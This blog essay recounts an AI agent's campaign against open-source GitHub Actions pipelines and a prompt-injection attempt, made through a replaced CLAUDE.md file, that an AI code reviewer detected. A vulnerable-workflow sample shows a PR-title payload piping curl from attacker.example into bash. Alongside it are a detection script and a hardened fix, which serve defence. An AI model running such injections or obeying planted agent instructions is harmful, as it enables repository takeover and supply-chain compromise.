An AI Agent Just Wiped a 32,000-Star Repo. The Only Thing That Stopped It Was Another AI.

An autonomous bot powered by Claude attacked seven major open-source projects, deleted 178 releases from Trivy, and published a malicious extension. One target survived, because Claude was also the defender.

Last week, an autonomous bot called hackerbot-claw attacked seven major open-source repositories. Microsoft. DataDog. The Cloud Native Computing Foundation. And Trivy, a security scanner with 32,000 GitHub stars and over 100 million annual downloads.

It found vulnerable CI/CD configurations, crafted pull requests, got remote code execution in at least four projects, and turned Trivy into a smoking crater. All 178 releases deleted. Repository privatized. Codebase wiped. A malicious VSCode extension published under Trivy's trusted identity.

The attacker wasn't a nation-state or a coordinated team. It was a single AI agent running on Claude Opus 4.5 with a vulnerability index of 47 sub-patterns and a crypto wallet asking for donations to "fund more scans."

How it worked

Between February 20 and March 2, hackerbot-claw scanned public GitHub repos for a specific misconfiguration: the pull_request_target trigger in GitHub Actions workflows.

This trigger has been documented as dangerous since 2021. Unlike the standard pull_request event, it runs with the base repository's secrets and write permissions but executes code from untrusted forks. Combine that with unsanitized ${{ }} expressions in shell commands and you get arbitrary code execution with full repository access.
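
The pattern looks something like this. A minimal sketch of a vulnerable workflow (hypothetical and illustrative, not taken from any of the affected projects):

```yaml
# .github/workflows/greet.yml -- hypothetical example of the vulnerable pattern
name: greet-prs
on:
  pull_request_target:      # runs in the BASE repo's context, with its secrets
    types: [opened, edited]

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      # DANGEROUS: the PR title is attacker-controlled, and the ${{ }}
      # expression is expanded into the script text BEFORE the shell runs.
      # A title like  "; curl attacker.example/x.sh | bash #  breaks out of
      # the echo and executes arbitrary commands with the workflow's token.
      - run: echo "New PR: ${{ github.event.pull_request.title }}"
```

Because the substitution happens before bash ever sees the script, quoting inside the `run:` line doesn't help. The fix is to pass untrusted values in through an environment variable, so they arrive as data rather than code.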

The bot used five techniques across seven targets. Branch names containing embedded shell commands. Filenames with base64-encoded payloads. Direct script modifications. And in one case, something genuinely new: it replaced a project's CLAUDE.md file with malicious instructions, trying to hijack an AI code reviewer.

Every successful attack followed the same playbook: open a PR, trigger the privileged workflow, execute a payload, steal the repository's GitHub token. All automated. The bot didn't sleep, didn't hesitate, didn't make typos.
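
The misconfiguration the bot hunted for can be flagged mechanically, which is part of why machine-speed scanning worked so well. A rough audit sketch (my own illustration, not the bot's code; it treats workflows as plain text, so it will miss some YAML edge cases):

```python
import re
from pathlib import Path

# Expressions that expand attacker-controlled PR data -- titles, bodies,
# and branch names -- directly into workflow scripts.
UNTRUSTED = re.compile(
    r"\$\{\{\s*github\.(event\.pull_request\.(title|body)|head_ref)\s*\}\}"
)

def risky_workflows(repo_root):
    """Yield workflow files that combine the privileged pull_request_target
    trigger with untrusted ${{ }} expressions -- the pattern hackerbot-claw
    exploited."""
    for path in Path(repo_root, ".github", "workflows").glob("*.y*ml"):
        text = path.read_text(encoding="utf-8", errors="ignore")
        if "pull_request_target" in text and UNTRUSTED.search(text):
            yield path
```

Run against a checkout, it surfaces exactly the combination described above: a privileged trigger plus unsanitized interpolation of fork-controlled input.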

The Trivy catastrophe

Trivy is one of the most widely used vulnerability scanners in Kubernetes environments. Not a side project.

The bot stole a personal access token 19 minutes after gaining code execution. With that token, it deleted every release from v0.27.0 through v0.69.1, privatized and renamed the repository, pushed an empty repo over the original, and published a trojanized VSCode extension to the Open VSX marketplace under Trivy's publisher identity.

The source code wasn't modified. Trivy's maintainer confirmed that commit IDs prove the codebase remained intact. But the release infrastructure, the distribution pipeline, the trust model that 100 million annual downloads depend on? Wrecked.

GitHub never fully restored the damage. Some 766 stars are still gone. Three thousand forks were reassociated with an unrelated repository. The 178 deleted releases and their binaries aren't coming back.

Claude vs. Claude

Here's the part I keep coming back to.

One target was ambient-code/platform, which uses Claude Code Action for automated PR review. Hackerbot-claw didn't try the usual CI/CD exploit here. Instead, it submitted a PR that replaced the project's CLAUDE.md file with malicious instructions telling Claude to vandalize the README, inject hidden HTML, and commit unauthorized changes.

Claude caught it in 82 seconds.

The reviewer classified it as a "textbook AI agent supply-chain attack via poisoned project-level instructions." No injected instructions were followed. No unauthorized commits made.

The attacker came back 12 minutes later with a subtler version, reframing the malicious instructions as a "consistency policy." Claude caught that too.

Seven targets, one survivor. The defense wasn't a firewall or a security team. It was an AI recognizing an AI attack and refusing to play along.

Think about that for a second. An AI agent powered by Claude attacked an AI pipeline. A different Claude model caught the attack and shut it down. That's the world we're in now, and almost nobody is set up for it.

Nobody is watching

The hackerbot-claw campaign matters beyond the immediate damage because of what it tells us about how organizations are actually deploying AI agents.

The Gravitee 2026 report surveyed over 900 executives and practitioners. Eighty-eight percent of organizations confirmed or suspected AI agent security incidents in the past year. Only 14.4 percent deploy agents with full security approval. Only 21.9 percent treat agents as independent entities that need their own access controls.

Nearly half use shared API keys for agent-to-agent authentication. More than half of deployed agents run without security oversight or logging. A quarter of deployed agents can create and task other agents on their own.

And yet 82 percent of executives feel confident their policies are good enough.

Christopher Robinson, CTO of the Open Source Security Foundation, put it plainly: "This is an active, automated attack, not a theoretical vulnerability."

What comes next

Hackerbot-claw wasn't sophisticated in the traditional sense. The pull_request_target vulnerability has been known for years. None of the individual techniques were new.

The packaging was new: an autonomous agent with 47 vulnerability patterns, scanning at machine speed, coming back to awesome-go, a 140,000-star curated list of Go packages, four times before getting execution, then switching tactics when it hit ambient-code. The bot found an AI reviewer instead of a misconfigured pipeline, so it shifted from infrastructure exploits to prompt injection. It identified the defense and adapted.

That's what an autonomous offensive agent looks like as a side project. Somebody with an API key and a free weekend. We already know what the professional version looks like. Anthropic disclosed a cyber espionage campaign last November where AI systems ran 80-90 percent of a multi-step operation against hardened targets autonomously. The humans were supervisors, not operators.

Hackerbot-claw is the open-source, visible version of that same trajectory. A supply chain attack run by a bot with a crypto wallet. It took a full week before anyone noticed.

The uncomfortable part

The only defense that stopped hackerbot-claw at the point of execution wasn't a SIEM, a SOC, or a security policy. It was another AI reviewing code, recognizing a prompt injection, refusing to comply.

That worked once. On one target. Because that particular project happened to have an AI reviewer in its pipeline. The other six used the same setup most organizations have today: minimal monitoring, shared credentials, and the assumption that CI/CD pipelines are trustworthy.
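
For the pipelines that weren't lucky enough to have an AI reviewer, the fix is mundane and has been documented for years. A hardened version of the workflow sketched earlier (again hypothetical): prefer the low-privilege `pull_request` trigger, pin permissions to the minimum, and route any untrusted value through an environment variable.

```yaml
# Hypothetical hardened equivalent of the vulnerable workflow
name: greet-prs
on:
  pull_request:             # runs without the base repo's secrets
permissions:
  contents: read            # least privilege, even if org defaults change

jobs:
  greet:
    runs-on: ubuntu-latest
    steps:
      - env:
          # The expression expands into an environment variable, not into
          # the script body, so shell metacharacters in the title are inert.
          PR_TITLE: ${{ github.event.pull_request.title }}
        run: echo "New PR: $PR_TITLE"
```

None of this is novel, which is the point: the attack succeeded against configurations that were known-bad long before an AI was cheap enough to hunt for them at scale.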

The question isn't whether more autonomous AI attacks are coming. It's whether anything will be watching when they do.


John Engates writes about agentic AI, infrastructure, and sometimes national security at exagentica.ai.